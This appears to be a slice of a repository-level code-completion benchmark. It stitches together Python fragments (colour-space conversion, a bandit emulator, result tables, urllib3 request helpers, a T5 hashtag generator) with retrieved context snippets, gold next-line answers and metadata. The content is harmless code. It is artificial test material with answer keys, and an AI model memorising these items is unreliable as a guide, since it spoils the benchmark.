ycbcr_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image) + shift_matrix.unsqueeze(0).unsqueeze(-1)
return ycbcr_image.reshape(bs,c,h,w)
def ycbcr2rgb(self,ycbcr_image):
ycbcr_image[:,1:] = torch.where(ycbcr_image[:,1:] > 0.94118,torch.ones_like(ycbcr_image[:,1:]) * 0.94118,ycbcr_image[:,1:])
ycbcr_image[:,0] = torch.where(ycbcr_image[:,0] > 0.92157,torch.ones_like(ycbcr_image[:,0]) * 0.92157,ycbcr_image[:,0])
ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape | identity_grid = make_coordinate_grid((h, w), type=kp_source['value'].type()) | 1 | 2023-12-16 12:49:10+00:00 | 4k |
DURUII/Replica-AUCB | emulator.py | [
{
"identifier": "AUCB",
"path": "algorithms/aucb.py",
"snippet": "class AUCB(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n # β_i(t), count for how many times each arm is... | from algorithms.aucb import AUCB
from algorithms.eps import EpsilonFirst
from algorithms.opt import Opt
from algorithms.separated import Separated
from arms import StrategicArm
import pickle | 3,027 | """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal':
| """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal': | self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B) | 2 | 2023-12-15 18:17:01+00:00 | 4k |
XLearning-SCU/2023-TPAMI-SMILE | _Utils/SummeryCla.py | [
{
"identifier": "DirectoryOperator",
"path": "_Utils/DirectoryOperator.py",
"snippet": "class DirectoryOperator:\r\n def __init__(self, directory: str):\r\n self.directory = directory\r\n\r\n def make_fold(self):\r\n if not TestMode:\r\n # print('mk dir {}'.format(os.path.... | import os
import warnings
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from _Utils.DirectoryOperator import DirectoryOperator
from _Utils.Visualize import visualize_plot
| 1,672 |
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
|
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
| DirectoryOperator(path).make_fold()
| 0 | 2023-12-21 08:50:36+00:00 | 4k |
Liyulingyue/ModulelyTools | codes/extraction/ModuleTools.py | [
{
"identifier": "parse_ipynb",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def parse_ipynb(file_path):\n \"\"\"\n # 示例:使用函数解析一个ipynb文件\n file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径\n result = parse_ipynb(file_path)\n print(result)\n \"\"\"\n # 读取ipynb文件\n wi... | from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python
from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun
from ..llm.Ernie import Ernie
from ..llm.Ernie import Ernie | 1,672 |
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
|
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
| function_defs = get_function_defs(py_str) | 5 | 2023-12-17 14:20:45+00:00 | 4k |
Azure-Samples/functions-python-web-crawler | .venv/Lib/site-packages/urllib3/util/request.py | [
{
"identifier": "UnrewindableBodyError",
"path": ".venv/Lib/site-packages/urllib3/exceptions.py",
"snippet": "class UnrewindableBodyError(HTTPError):\n \"\"\"urllib3 encountered an error when trying to rewind a body\"\"\""
},
{
"identifier": "to_bytes",
"path": ".venv/Lib/site-packages/ur... | import io
import typing
import brotlicffi as _unused_module_brotli # type: ignore[import] # noqa: F401
import brotli as _unused_module_brotli # type: ignore[import] # noqa: F401
import zstandard as _unused_module_zstd # type: ignore[import] # noqa: F401
from base64 import b64encode
from enum import Enum
from ..exceptions import UnrewindableBodyError
from .util import to_bytes
from typing import Final | 1,772 |
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
A 'Content-Length' of 'None' indicates the length of the body
can't be determined so should use 'Transfer-Encoding: chunked'
for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)):
| from __future__ import annotations
if typing.TYPE_CHECKING:
# Pass as a value within ``headers`` to skip
# emitting some HTTP headers that are added automatically.
# The only headers that are supported are ``Accept-Encoding``,
# ``Host``, and ``User-Agent``.
SKIP_HEADER = "@@@SKIP_HEADER@@@"
SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])
ACCEPT_ENCODING = "gzip,deflate"
try:
try:
except ImportError:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",br"
try:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",zstd"
class _TYPE_FAILEDTELL(Enum):
token = 0
_FAILEDTELL: Final[_TYPE_FAILEDTELL] = _TYPE_FAILEDTELL.token
_TYPE_BODY_POSITION = typing.Union[int, _TYPE_FAILEDTELL]
# When sending a request with these methods we aren't expecting
# a body so don't need to set an explicit 'Content-Length: 0'
# The reason we do this in the negative instead of tracking methods
# which 'should' have a body is because unknown methods should be
# treated as if they were 'POST' which *does* expect a body.
_METHODS_NOT_EXPECTING_BODY = {"GET", "HEAD", "DELETE", "TRACE", "OPTIONS", "CONNECT"}
def make_headers(
keep_alive: bool | None = None,
accept_encoding: bool | list[str] | str | None = None,
user_agent: str | None = None,
basic_auth: str | None = None,
proxy_basic_auth: str | None = None,
disable_cache: bool | None = None,
) -> dict[str, str]:
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'. If either the ``brotli`` or
``brotlicffi`` package is installed 'gzip,deflate,br' is used instead.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example:
.. code-block:: python
import urllib3
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
A 'Content-Length' of 'None' indicates the length of the body
can't be determined so should use 'Transfer-Encoding: chunked'
for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)): | chunks = (to_bytes(body),) | 1 | 2023-12-16 04:12:01+00:00 | 4k |
ict-bigdatalab/RIGHT | model.py | [
{
"identifier": "Twitter_THG",
"path": "get_datasets.py",
"snippet": "class Twitter_THG(Dataset):\n def __init__(self, tokenizer, args, mode):\n super(Twitter_THG, self).__init__()\n if mode == 'train':\n self.src_data_path = args.train_src_file\n self.dst_data_pat... | import torch
import torch.nn as nn
import argparse
from transformers import T5ForConditionalGeneration, T5Tokenizer, T5Config, AutoModelForSeq2SeqLM, MT5ForConditionalGeneration
from get_datasets import Twitter_THG
from torch.utils.data import DataLoader
from Template import SEP, MAP_SPETOKENS_IDS
from eval_utils import extracte_hashtags_from_sequence | 1,961 |
class GenerativeModel(nn.Module):
def __init__(self, args, tokenizer):
super().__init__()
self.args = args
self.tokenizer = tokenizer
if args.dataset == 'THG':
if args.load_pretrained_parameters:
self.model = T5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
else:
config = T5Config.from_pretrained(self.args.model_name_or_path)
self.model = AutoModelForSeq2SeqLM.from_config(config)
print(f"\nthe model is {self.args.model_name_or_path} from scratch")
elif args.dataset == 'WHG':
self.model = MT5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
def forward(self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, labels):
outputs = self.model(input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
labels=labels)
return outputs
def generate(self, batch, num_beams=1):
self.eval()
if self.args.dataset == 'WHG':
with torch.no_grad():
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
num_return_sequences=num_beams
)
decs = [self.tokenizer.decode(ids, skip_special_tokens=True) for ids in outputs]
dec = []
batch_size = len(batch['src'])
for bs in range(batch_size):
hashtag_str = ''
for d in range(bs * num_beams, (bs+1) * num_beams, 1):
hashtag_str = hashtag_str + decs[d] + ' ' + SEP + ' '
hashtag_str = hashtag_str[:(len(SEP) + 2) * (-1)].strip()
dec.append(hashtag_str)
else:
with torch.no_grad():
# if num_beams == 1:
# self.model._cache_input_ids = batch['source_ids'].to(self.args.device)
# else:
# expanded_return_idx = (
# torch.arange(batch['source_ids'].shape[0]).view(-1, 1).repeat(1, num_beams).view(-1).to(
# self.to(self.args.device))
# )
# input_ids = batch['source_ids'].index_select(0, expanded_return_idx)
# self.model._cache_input_ids = input_ids.to(self.args.device)
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
)
# decode outputs
sequences = outputs
dec = [self.tokenizer.decode(ids, skip_special_tokens=False, clean_up_tokenization_spaces=False) for ids in
sequences]
for d in range(len(dec)):
dec[d] = dec[d].replace('<pad>', '')
dec[d] = dec[d].replace('</s>', '').strip()
result = extracte_hashtags_from_sequence(dec[d])
dec[d] = ""
if len(result) == 0:
dec[d] = "None"
else:
for res in result:
dec[d] = dec[d] + res + " " + SEP + " "
dec[d] = dec[d][:(len(SEP) + 2) * (-1)].strip()
self.train()
# the shape is [batch_size, seq_len]
return dec
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", default="./PLM_checkpoint/t5-base", type=str)
parser.add_argument("--device", default='cpu', type=str,)
parser.add_argument("--max_target_length", default=100, type=int)
args = parser.parse_args()
tokenizer = T5Tokenizer.from_pretrained('PLM_checkpoint/t5-base')
model = GenerativeModel(args, tokenizer)
src_path = 'data/THG_twitter/twitter.2021.valid.src'
dst_path = 'data/THG_twitter/twitter.2021.valid.dst'
|
class GenerativeModel(nn.Module):
def __init__(self, args, tokenizer):
super().__init__()
self.args = args
self.tokenizer = tokenizer
if args.dataset == 'THG':
if args.load_pretrained_parameters:
self.model = T5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
else:
config = T5Config.from_pretrained(self.args.model_name_or_path)
self.model = AutoModelForSeq2SeqLM.from_config(config)
